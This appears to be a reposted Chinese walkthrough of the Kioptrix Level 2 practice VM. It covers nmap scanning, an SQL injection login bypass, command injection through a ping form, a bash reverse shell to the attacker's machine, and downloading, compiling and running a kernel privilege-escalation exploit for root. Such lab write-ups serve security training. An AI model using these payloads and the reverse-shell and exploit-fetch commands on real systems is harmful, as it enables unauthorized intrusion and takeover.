【OSCP+】Kioptrix 提权靶机(2)

admin 2025年2月6日21:10:04评论3 views字数 1541阅读5分8秒阅读模式

靶机 IP 确定

  1. 先找到自己虚拟机的 IP 地址:

    命令:

    ifconfig
【OSCP+】Kioptrix 提权靶机(2)

找到自己虚拟机 IP 地址是因为等会需要探测靶机的 IP,因为部署的时候本机和靶场在同一网段下

  1. 开始探测靶场地址:

    命令:

    nmap -sP 192.168.222.0/24
【OSCP+】Kioptrix 提权靶机(2)

这里通过 IP 地址可以看出来最后一个属于我们自己的本机地址,但是我如何知道哪一个才是我们的靶场地址呢?

这里提供两种方法供各位看官去采纳:

方法一:先不打开靶机,先扫一次网段,记下所有的 ip 地址,然后再打开靶机,再扫一次,那么多出来的 IP 便是我们的靶机地址

方法二:对比现在扫出来的 Mac 地址,找到一样的就是我们的靶机了

这里因为时间关系,我就直对照 Mac 地址了

【OSCP+】Kioptrix 提权靶机(2)

这是靶机的 Mac 地址

【OSCP+】Kioptrix 提权靶机(2)

这是扫描过后发现所有的网段地址,比对 Mac 后成功找到靶机!

开始靶机探测

  1. 扫描靶机的详细信息

    命令:

    nmap -sT -sV -sC -O 192.168.222.131
【OSCP+】Kioptrix 提权靶机(2)

命令解析

  1. -sTTCP Connect 扫描
    • 使用完整的 TCP 连接扫描目标主机的端口。这种扫描方式通常用于没有管理员权限的情况下,因为它不需要直接操作原始套接字。
  2. -sV服务版本检测- 尝试探测每个开放端口所运行的服务版本(如具体的 HTTP 服务器版本或 SSH 版本)。
  3. -sC默认脚本扫描
    • 运行一组 Nmap 默认的脚本(--script=default),包括常见的服务发现、版本检测和漏洞信息收集。
  4. -O操作系统指纹检测
    • 尝试通过网络特征信息推测目标主机所运行的操作系统。
  5. 192.168.222.131目标 IP 地址
    • 您扫描的目标主机位于本地网络(192.168.222.0/24 子网)中,IP 地址为 192.168.222.131

扫描的非常详细,发现一个http的80端口是打开的,那我们接下来在网页端访问一下看看。

【OSCP+】Kioptrix 提权靶机(2)

这时候发现一个登录页面,那我们先试一下SQL注入,先试一下弱口令,失败了,那我们再试试别的

admin' or 1=1#
【OSCP+】Kioptrix 提权靶机(2)

这时候发现成功进来了

可以看到它需要进行ping 但是没发现ping命令执行的地方,同时打开源码看一下。

【OSCP+】Kioptrix 提权靶机(2)

这里发现他有一个input框没显示出来,发现是缺少了个单引号,那我们给它加上试试。

【OSCP+】Kioptrix 提权靶机(2)

输入框也是完整的显示出来了

执行一下命令

【OSCP+】Kioptrix 提权靶机(2)
【OSCP+】Kioptrix 提权靶机(2)

执行成功了!

反弹shell

kali打开一个监听

nc -lvp 4444    
【OSCP+】Kioptrix 提权靶机(2)

命令执行反弹shell

127.0.0.1 && /bin/bash -c 'bash -i >& /dev/tcp/kaliIP地址/4444 0>&1'

反弹成功【OSCP+】Kioptrix 提权靶机(2)

查看一下用户和系统信息

whoami
lsb_release -a

【OSCP+】Kioptrix 提权靶机(2)阿帕奇的服务和CentOS release 4.5(Final)系统

接下来开始提权

先查找对应的exp

searchsploit CentOS 4.5  

【OSCP+】Kioptrix 提权靶机(2)虽然没显示全,但是基本确定第二个可以利用

【OSCP+】Kioptrix 提权靶机(2)

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)

下载exp

searchsploit CentOS 4.5 -m 9542.c
【OSCP+】Kioptrix 提权靶机(2)

传输

打开http服务或者Apache的服务都可以,之前靶机1我们选用的是http服务的80端口,那这次我们用Apache的服务来传递

打开服务

sudo systemctl status apache2
【OSCP+】Kioptrix 提权靶机(2)

传递文件

mv 9542.c /var/www/html
【OSCP+】Kioptrix 提权靶机(2)

让靶机下载提权文件

cd /tmp
wget http://192.168.222.130/9542.c

【OSCP+】Kioptrix 提权靶机(2)下载成功

编译文件

gcc 9542.c
【OSCP+】Kioptrix 提权靶机(2)

添加执行权限,运行a.out

chmod 777 a.out
./a.out

【OSCP+】Kioptrix 提权靶机(2)提权成功!

原文始发于微信公众号(泷羽Sec-醉陌离):【OSCP+】Kioptrix 提权靶机(2)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月6日21:10:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP+】Kioptrix 提权靶机(2)https://cn-sec.com/archives/3706424.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息